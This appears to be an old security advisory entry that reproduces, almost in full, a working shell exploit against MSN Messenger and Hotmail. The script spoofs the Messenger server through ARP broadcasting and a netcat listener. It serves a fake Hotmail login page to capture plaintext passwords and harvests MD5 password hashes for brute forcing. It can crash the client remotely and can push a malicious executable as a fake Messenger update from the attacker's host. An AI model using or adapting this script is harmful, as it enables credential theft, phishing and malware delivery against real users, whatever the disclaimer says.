COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail
PROBLEM
Gregory Duchemin found following. This a little sploit he wrote
for Linux to test a man in the middle attack against
Messenger/Hotmail. A kind of swiss army knife that:
- use the messenger scrambler bug to get passwords hashes
- spoof hotmail site to retrieve plaintext passwords (since
protocol is not enciphered) when users open their hotmail
account directly from messenger.
- remotely crash the client (i did not yet identify where exactly
live the bug)
- upload a malicious program of your choice as an update. Since
it was not signed by microsoft, messenger will complain about
it but however will ask the user if he wishes to open it anyway.
Guess what should be a typical user behavior ? ;)
This script need the useful arptool from Cristiano Lincoln Mattos
and our favorite web server (for hotmail spoofing and fake
messenger update).
#!/bin/sh
#
# //
# // neaky.sh
# \\
# \\ wiss army knife for Hotmail/Messenger
# //
# //
#
#
# "Spoofing/brute force/misconception/unexpected input Class Attack"
#
#
#
# AUTHOR: Gregory Duchemin ( Aka c3rb3r )
#
# COMPANY: NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest, suite 200
# H3A 3C8 Montreal (Quebec) CANADA
# gdn@neurocom.com
# 514 908 6800
# http://www.securite-internet.com
#
# DATE: January 2001
#
# PURPOSE: Will spoof Hotmail/messenger server to recover user
# hotmail/password, crash messenger client, remotely inject and
# execute malicious exe on the victim host.
#
# NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY
# to the limited broadcast address/IP Broadcast
# otherwise u can still try it on your own gateway or from your provider ;)
# As a last resort, u can temporalily modify your DNS entry for
# messenger servers.
#
# REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly.
# =================================================================
##########################################################################################
#
# THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY
#
##########################################################################################
export delay=100000
###################################
# Things to be configured first
###################################
# IP address of messenger server to spoof
# It change from client to client, check it by sniffing or u can always
# assign as many virtual ip as there are messenger server IP.
export messenger="64.4.13.56"
# HTTP document root
export cgiroot="/usr/local/apache/cgi-bin/"
export httproot="/usr/local/apache/htdocs/"
# Malicious exe location
export malicious_path="/tmp/"
export malicious="mmssetup.exe"
# Access URI : stupid garbage to hide the real url
export relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"
# Messenger PORT
export PORT=1863
# real IP of our fake hotmail server, this host ip
export MYIP="192.168.10.17"
# number of non read messages,
# need at least 1 to stimulate requests from the client
export nrmsg="10"
#number of non read folders
export nrfld="0"
#path/filename where to store hotmail password
export PASSWORD_HERE="/tmp/hotmail-pass"
#path to reach your arp spoofer/flooder
export ARP="arptool"
##########################################
# End of configuration options
##########################################
handl3r()
{
echo
echo "Job finished, hope everything is ok...."
echo "see ./log for details."
echo
html_cleaner
sync
killall "$ARP"
exit
}
usage()
{
echo
echo -e "Usage: $0 [MODE] \n"
echo
echo "MODE: 1 / Hotmail web spoof for clear password recovery."
echo " 2 / Hotmail weakenned MD5 password Hash recovery for bruteforce."
echo " 3 / Messenger Remote CrAsh."
echo " 4 / Remote injection of malicious exe."
echo
echo
echo "NOTE: Don't forget to customize settings in the script (the first lines)."
echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel."
echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !"
echo
echo "DETAILS: attack 1/ will trojanize victim to get back a plain password."
echo " attack 2/ will ask for weak md5 hash."
echo " attack 3/ will crash the client.(exploitable b.overflow ?)"
echo " attack 4/ will upload a fake update, naively installed."
echo
echo "have a nice day"
echo " Gregory Duchemin ( c3rb3r@hotmail.com )"
echo
echo
}
if [ $# -lt 1 ]; then
usage
exit
fi
export MODE="$1"
if [ $MODE -gt 4 ]; then
usage
exit
fi
# IP_forwarding should be set to avoid detection/suspicion.
sysctl -w net.ipv4.conf.all.forwarding=1
if [ $? -eq 1 ]; then
usage
echo
echo
echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."
echo
echo
fi
# automatic configuration of arp broadcasting/spoofing over the Lan.
echo
echo -n "ARP broadcast : "
$ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2 2>&1 > /dev/null &
if [ $? -eq 1 ]; then
usage
echo
echo
echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."
echo
echo
exit
fi
echo "OK"
export TID=$!
if [ $MODE = "2" ]; then
echo
echo "Weak MD5 hashes will be stored in /tmp/md5-password"
echo
echo
fi
if [ $MODE = "1" ]; then
echo
echo "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"
echo
echo
fi
if [ $MODE = "3" ]; then
echo
echo "Remote client may suddenly die...."
echo
echo
fi
if [ $MODE = "4" ]; then
if [ ! -f $malicious_path"/$malicious" ]; then
echo
echo "Please first define the trojan (in the configuration section)"
echo
echo
exit 0
fi
echo
echo "Remote Injection of junky data."
echo
echo
fi
trap handl3r SIGINT
function html_builder()
{
echo -n -e "#!/bin/sh\n
cat << __MYGIFT__
Content-type:text/html\n
<html>
<!--
JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES
-->
<body>
<div align=left>
<div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\">
<div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\">
<form name=\"passwordform\" action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td>
<a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a>
</td>
<td align=CENTER nowrap>
<img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br>
<a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td>
</tr>
<tr><td height=6></td></tr>
<tr valign=top>
<td><font class=s>
</font>
</td>
<td rowspan=4><font class=s>
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class=f size=2><b><" > $cgiroot"/$relogin"
cat /tmp/.mail >> $cgiroot"/$relogin"
echo -n -e "></b></font>
<input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign=middle><font class=sbd>Password</font> </td>
<td><input type=password name=PASSWORD size=16 maxlength=16></td>
<td width=22 valign=\"middle\" align=\"center\"> </td>
<td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td>
</tr>
<tr>
<td></td>
<td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept.
<a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a>
<a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement
</font></a>
</td>
</tr>
</table>
</div>
<p align=center>
<img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 >
</div>
</div>
</body>
</html>
\n__MYGIFT__\n\n">> $cgiroot"/$relogin"
chmod a+x $cgiroot"/$relogin"
#echo "This is the false update for messenger." > $httproot"mmssetup.exe"
echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"
}
html_cleaner()
{
rm -f $cgiroot"/$relogin"
mkdir -p $httproot"$relogin"
chmod a+rwx $httproot"$relogin"
cp -f $malicious $httproot"$relogin""/mmssetup.exe"
rm -f $httproot"response.html"
}
#IP ALIAS with messenger IP
echo
echo -n "Interface configuration : "
ifconfig eth0:0 inet $messenger
echo "OK"
echo
echo "Waiting for a client n0w...."
echo
# things are getting serious now, this is the messenger automate:
export flag="0"
cat /dev/null > ./trace
while true
do
sync
(
usleep $delay
while true
do
export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"
if [ "$parsed" != "" ]; then
sync
export request=$(echo $parsed | awk '{print $1}')
export num=$(echo $parsed | awk '{print $2}')
case "$request" in
VER)
usleep $delay
cat ./log | sed -e "s/VER/ver/" > ./log
echo -e "VER $num MSNP5 MSNP4 CVR0\r"
sync
usleep $delay
;;
INF)
cat ./log | sed -e "s/INF/inf/" > ./log
export new=$(echo $num | sed -e 's/.$/ /')
echo -e "INF $new""MD5\r"
usleep $delay
;;
USR)
cat ./log | sed -e "s/USR/usr/" > ./log
export ttype=$(echo $parsed | awk '{print $4}')
if [ "$ttype" = "I" ]; then
export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
echo "$email" > /tmp/.mail
html_builder
rm -f /tmp/.mail
if [ ! $MODE = "2" ]; then
echo -e "USR $num MD5 S "$(date "+%s")"\r"
else
echo -e "USR $num MD5 S \r"
fi
else
export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
if [ $MODE = "2" ]; then
echo -e "910 $num \r"
usleep $delay
echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password
sync
exit
fi
echo -e "USR $num OK $email $email\r"
fi
usleep $delay
;;
SYN)
export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')
cat ./log | sed -e "s/SYN/syn/" > ./log
export time=$(date "+%s")
echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgspro\
file; charset=UTF-8\r\nLoginTime: $time\
\r\nEmailEnabled: 1\r\nMemberIdHigh: 84\
224\r\nMemberIdLow: 1114357868\r\nlang_pre\
ference: 1033\r\npreferredEmail: \r\ncount\
ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\
60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \
2AAAAAAA\
AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\
t3erLcBGzQ$$\r\n\r"
usleep $delay
echo -e "SYN $num $syn\r"
usleep $delay
sync
;;
CVR)
export version=$(echo $parsed | awk '{print $8}')
cat ./log | sed -e "s/CVR/cvr/" > ./log
if [ "$flag" = "0" ]; then
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP\
/$relogin""/$malicious http://$MYIP/$relogin""/$malicious\
\r"
else
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://$MYIP/\
/mmssetup.exe http://$MYIP\
/\r"
fi
export flag="1"
else
if [ "$flag" = "1" ]; then
echo -e "$chg"
echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\
n: 1.0\r\nContent-Type: text/x-msmsgsini\
tialemailnotification; charset=UTF-8\r\n\
\r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\
\r\nInbox-URL: /$relogin""\r\nFolders\
-URL: /$relogin""\r\nGet-URL: http\
//$MYIP\r\n\r"
if [ $MODE = "4" ]; then
echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
ttp://$MYIP/\
mmssetup.exe http://$MYIP/\r"
else
echo -e "CVR $num $version $version 1.0.0863 h\
ttp://download.microsoft.com/download/\
msnmessenger/Patch/2.1/Win98/EN-US/msg\
strst.dll http://messenger.msn.com/\r"
fi
export flag="3"
echo -e "BPR $num C3rb3r@hotmail.com PHH\r"
echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\
c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\
otmail.com MOB N\r"
usleep $delay
if [ $MODE = "3" ]; then
echo -e "ADD 0 AL Crash Crash \r"
usleep $delay
exit 0
fi
fi
fi
usleep $delay
;;
CHG)
export chg=$( echo "$parsed"| egrep "CHG")
cat ./log | sed -e "s/CHG/chg/" > ./log
usleep $delay
;;
OUT)
html_cleaner
exit 0
;;
URL)
cat ./log | sed -e "s/URL/url/" > ./log
echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\
\r"
usleep $delay
;;
esac
fi
done
)| nc -w 5 -s $messenger -n -l -p $PORT > ./log 2>/dev/null
egrep -e 'OUT' ./log > /dev/null
if [ ! $? -eq 1 ]; then
echo
echo "Victim has signed out...."
echo "see ./log for details."
echo
fi
done
SOLUTION
Nothing to do.